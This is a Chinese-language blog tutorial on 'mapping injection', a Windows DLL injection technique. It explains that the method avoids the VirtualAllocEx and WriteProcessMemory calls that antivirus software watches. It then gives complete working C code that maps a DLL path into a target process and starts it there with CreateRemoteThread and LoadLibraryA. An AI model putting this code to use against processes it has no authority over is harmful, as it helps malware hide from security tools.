抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

映射注入

Dll注入

发布于:2023年7月16日

映射注入实际上的思路与远程线程注入一致,只不过映射注入改变了Dll的写入方式而已。

概念

映射注入是一种内存注入技术,创建的Mapping对象本质上属于申请一块物理内存,而物理内存又能比较方便的通过系统函数直接映射到进程的虚拟内存中,就避免使用一些经典函数例如VirtualAllocEx,WriteProcessMemory等被杀毒软件严密监控的API。

实现思路

在注入进程创建mapping对象,向被映射的虚拟地址空间写入shellcode,打开被注入的进程句柄,将mapping映射到被注入进程的虚拟地址,创建远程线程调用。

代码实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#include <windows.h>
#include <stdio.h>
#include<string.h>
#pragma comment(lib, "OneCore.lib")

//  DLL path
const char* dllPath = "F:\\code_py&C\\vs2017\\injecte\\Dll1\\Debug\\Dll1.dll";
//const char* dllPath = "F:\\code_py&C\\vs2017\\injecte\\Dll1\\x64\\Release\\Dll1.dll";
DWORD pid = 37836;

int main()
{
	// 打开目标程序
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	if (!hProcess)
	{
		printf("目标进程打开失败. Error code: %d\n", GetLastError());
		return -1;
	}

	//创建dll路径的映射对象
	HANDLE hMapping = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, strlen(dllPath) + 1, NULL);
	if (!hMapping)
	{
		printf("创建失败. Error code: %d\n", GetLastError());
		CloseHandle(hProcess);
		return -1;
	}

	// 将文件映射到当前进程
	LPVOID lpMapAddress = MapViewOfFile(hMapping, FILE_MAP_WRITE, 0, 0, strlen(dllPath) + 1);
	if (!lpMapAddress)
	{
		printf("映射失败. Error code: %d\n", GetLastError());
		CloseHandle(hMapping);
		CloseHandle(hProcess);
		return -1;
	}

	// 将dll路径写入映射内存
	strcpy((char*)lpMapAddress, dllPath);

	// 目标进程中获取loadlibrary的路径
	LPVOID pLoadLibraryA = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
	if (!pLoadLibraryA)
	{
		printf("获取LoadLibraryA函数失败. Error code: %d\n", GetLastError());
		UnmapViewOfFile(lpMapAddress);
		CloseHandle(hMapping);
		CloseHandle(hProcess);
		return -1;
	}

	// 将文件映射映射到远程进程
	LPVOID lpRemoteMapAddress = MapViewOfFile2(hMapping, hProcess, 0, NULL, 0, 0, PAGE_READWRITE);
	if (!lpRemoteMapAddress)
	{
		printf("Failed to map view of file in the target process. Error code: %d\n", GetLastError());
		UnmapViewOfFile(lpMapAddress);
		CloseHandle(hMapping);
		CloseHandle(hProcess);
		return -1;
	}

	// 创建远程线程调用loadlibrary函数去加载dll
	HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibraryA, lpRemoteMapAddress, 0, NULL);
	if (!hRemoteThread)
	{
		printf("Failed to create a remote thread in the target process. Error code: %d\n", GetLastError());
		UnmapViewOfFile(lpRemoteMapAddress);
		UnmapViewOfFile(lpMapAddress);
		CloseHandle(hMapping);
		CloseHandle(hProcess);
		return -1;
	}

	// 等待线程运行结束
	WaitForSingleObject(hRemoteThread, INFINITE);

	// Cleanup
	CloseHandle(hRemoteThread);
	UnmapViewOfFile(lpRemoteMapAddress);
	UnmapViewOfFile(lpMapAddress);
	CloseHandle(hMapping);
	CloseHandle(hProcess);

	return 0;
}

更新于:2024年5月12日